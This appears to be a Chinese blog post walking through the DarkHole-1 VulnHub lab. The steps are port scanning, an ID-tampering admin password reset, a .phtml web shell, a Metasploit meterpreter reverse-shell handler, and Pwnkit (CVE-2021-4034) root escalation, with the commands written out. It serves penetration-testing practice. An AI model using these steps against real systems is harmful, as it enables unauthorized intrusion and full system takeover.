Web到Linux-内核溢出Pwnkit

复现环境: https://www.vulnhub.com/entry/darkhole-1,724/
解压DarkHole.zip,导⼊虚拟机

步骤一:信息搜集

1.探测⽬标ip及开发端⼝
nmap -p1-65535 192.168.251.0/24

2.发现了开放80端口192.168.251.128

步骤二:Web漏洞利⽤

1.重置管理密码,注册新账号抓包将id改为1

2.使用admin管理员账号登录

3. 上传一个1.phtml的木马

4.用哥斯拉来连接

步骤三:反弹MSF  

1.将内核检测脚本和综合检测脚本都上传到⽬标服务器的/tmp⽬录

2.启动msf
msfdb run
2.监听本地6666端⼝等待php反弹后⻔连接
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run

步骤四:内核提权

1.上传提权辅助脚本
upload /root/linux-exploit-suggester.sh /tmp/linux-exploit-suggester.sh
upload /root/linpeas.sh /tmp/linpeas.sh
2.进⼊shell
shell
cd /tmp
chmod +x linpeas.sh
chmod +x linux-exploit-suggester.sh
3.综合辅助脚本
./linpeas.sh
4. 内核辅助脚本
./linux-exploit-suggester.sh

5.查找漏洞利⽤模块
search cve_2021_4034
6.使⽤提权漏洞利⽤模块
use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
set session 1
run
7. 在获取的shell中查看当前⽤户权限
getuid
  • 6
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值